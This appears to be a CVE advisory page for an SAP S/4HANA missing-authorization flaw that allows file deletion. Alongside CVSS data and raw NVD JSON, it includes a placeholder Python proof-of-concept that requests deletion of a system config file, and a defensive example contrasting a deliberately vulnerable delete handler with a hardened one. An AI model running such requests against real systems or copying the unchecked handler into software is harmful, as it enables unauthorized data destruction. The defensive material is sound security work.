Security Vulnerability Report
CVE-2026-27673 CVSS 4.9 MEDIUM

CVE-2026-27673

Published: 2026-04-14 00:16:05
Last Modified: 2026-04-17 15:18:17

Description

Due to a missing authorization check (CWE-862), SAP S/4HANA (Private Cloud and On-Premise) allows an authenticated user to delete files on the operating system and gain unauthorized control over file operations. The vendor rates the result as no impact on Confidentiality and a Low impact on Integrity and Availability of the application. Note that the attacker must already hold a valid account (PR:L) and that attack complexity is rated High; the advisory does not name the affected component or the interface through which the file operation is reached.

CVSS Details

CVSS Score
4.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:N/I:L/A:L
Attack Vector: Network; Attack Complexity: High; Privileges Required: Low; User Interaction: None; Scope: Changed; Confidentiality: None; Integrity: Low; Availability: Low
Exploitability Sub-score
1.8
Impact Sub-score
2.7
Weakness
CWE-862 (Missing Authorization)

Configurations (Affected Products)

No NVD CPE configuration data is available (vulnerability status: Awaiting Analysis). The affected product named in the vendor description is:

SAP S/4HANA (Private Cloud and On-Premise)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Conceptual Proof of Concept (PoC) for CVE-2026-27673.
# It demonstrates how an authenticated attacker might exploit missing authorization checks.
# The endpoint path and the "file_path" / "action" parameters are placeholders: the advisory
# does not name the vulnerable component or its interface, so they must be replaced with
# details from SAP Note 3703813 and the target system before this does anything.

TARGET_URL = "https://target-sap-system.com:44300/sap/bc/webdynpro_abap/some_file_handler"
SESSION_COOKIE = "sap-usercontext=...; MYSAPSSO2=..."  # Valid authenticated session cookie

headers = {
    "Cookie": SESSION_COOKIE,
    "User-Agent": "Mozilla/5.0 (PoC-Scanner)",
    "Content-Type": "application/x-www-form-urlencoded",
}

# Payload attempting to delete a critical file on the OS
data = {
    "file_path": "/usr/sap/SYS/global/important_config.xml",
    "action": "delete",
}

try:
    # verify=False is deliberate for lab systems with self-signed certificates.
    response = requests.post(TARGET_URL, headers=headers, data=data, verify=False)
    if response.status_code == 200:
        # HTTP 200 only means the request was accepted; confirm on the OS that the file is gone.
        print("[+] Request sent successfully. Check if file was deleted.")
        print("[+] Response:", response.text)
    else:
        print("[-] Request failed with status code:", response.status_code)
except Exception as e:
    print("[!] Error:", str(e))
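The description reduces to one pattern: the server confirms that the caller is logged in but never asks whether that caller is allowed to delete the file they name. The following is an added illustration of that CWE-862 pattern and its fix, written for this page; it is not SAP's code and not the vulnerable component, which the advisory does not identify. The role names, the `file:delete` permission string and the directory layout are constructed for the example; in S/4HANA the equivalent check is an AUTHORITY-CHECK against the relevant authorization object, and path confinement is done with logical file names.

```python
import os
import tempfile
from pathlib import Path

# Constructed permission model for the illustration (hypothetical, not SAP's).
ROLE_PERMISSIONS = {
    "file_admin": {"file:delete"},
    "report_viewer": set(),          # authenticated, but holds no file rights
}


class NotAuthorized(Exception):
    pass


def delete_unchecked(role, path):
    """Vulnerable pattern (CWE-862): the caller is authenticated (we know its role),
    but nothing checks whether that role may delete files, and the supplied path
    is used as-is, so any authenticated user can remove any file the service
    account can reach."""
    os.remove(path)
    return True


def delete_checked(role, requested, base_dir):
    """Hardened pattern: authorize the action first, then confine the target.
    Both checks are needed: authorization alone still lets an admin delete
    files outside the intended area, confinement alone still lets any user
    delete files inside it."""
    if "file:delete" not in ROLE_PERMISSIONS.get(role, set()):
        raise NotAuthorized("role %r may not delete files" % role)
    base = Path(base_dir).resolve()
    # Path joining silently discards `base` when `requested` is absolute, and
    # "../" escapes it, so resolve the result and check containment explicitly.
    target = (base / requested).resolve()
    if target != base and base not in target.parents:
        raise NotAuthorized("%s is outside %s" % (target, base))
    if not target.is_file():
        raise FileNotFoundError(str(target))
    os.remove(target)
    return True


def demo():
    """Exercise both handlers on constructed files; return what each permitted."""
    results = {}
    with tempfile.TemporaryDirectory() as work:
        exports = Path(work) / "exports"          # the only directory deletes should touch
        exports.mkdir()
        (exports / "report.csv").write_text("a,b\n")
        config = Path(work) / "config.xml"        # stands in for a file outside that area
        config.write_text("<config/>")

        # A viewer is refused before any path handling happens.
        try:
            delete_checked("report_viewer", "report.csv", exports)
            results["checked_viewer"] = "allowed"
        except NotAuthorized:
            results["checked_viewer"] = "refused"

        # An admin is refused for traversal and for absolute paths outside the area.
        for label, path in (("traversal", "../config.xml"), ("absolute", str(config))):
            try:
                delete_checked("file_admin", path, exports)
                results["checked_admin_" + label] = "allowed"
            except NotAuthorized:
                results["checked_admin_" + label] = "refused"
        results["config_survives_checked"] = config.exists()

        # An admin deleting inside the area succeeds.
        results["checked_admin_inside"] = delete_checked("file_admin", "report.csv", exports)
        results["report_survives"] = (exports / "report.csv").exists()

        # The unchecked handler lets the viewer delete the outside file outright.
        results["unchecked_viewer_outside"] = delete_unchecked("report_viewer", str(config))
        results["config_survives_unchecked"] = config.exists()
    return results


if __name__ == "__main__":
    for k, v in demo().items():
        print("%-28s %s" % (k, v))
```

When reviewing a fix for this class of bug, look for both halves in the patched handler: a check tied to the action being performed (not just a session cookie), and a path check done on the resolved path rather than on the string the client sent.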

References

https://me.sap.com/notes/3703813 (SAP Note 3703813, vendor advisory)
https://url.sap/sapsecuritypatchday (SAP Security Patch Day)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-27673",
    "sourceIdentifier": "[email protected]",
    "published": "2026-04-14T00:16:05.477",
    "lastModified": "2026-04-17T15:18:16.507",
    "vulnStatus": "Awaiting Analysis",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Due to a missing authorization check, SAP S/4HANA (Private Cloud and On-Premise) allows an authenticated user to delete files on the operating system and gain unauthorized control over file operations which could leads to no impact on Confidentiality, Low impact on Integrity and Availability of the application."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:N/I:L/A:L",
            "baseScore": 4.9,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "HIGH",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "availabilityImpact": "LOW"
          },
          "exploitabilityScore": 1.8,
          "impactScore": 2.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-862"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://me.sap.com/notes/3703813",
        "source": "[email protected]"
      },
      {
        "url": "https://url.sap/sapsecuritypatchday",
        "source": "[email protected]"
      }
    ]
  }
}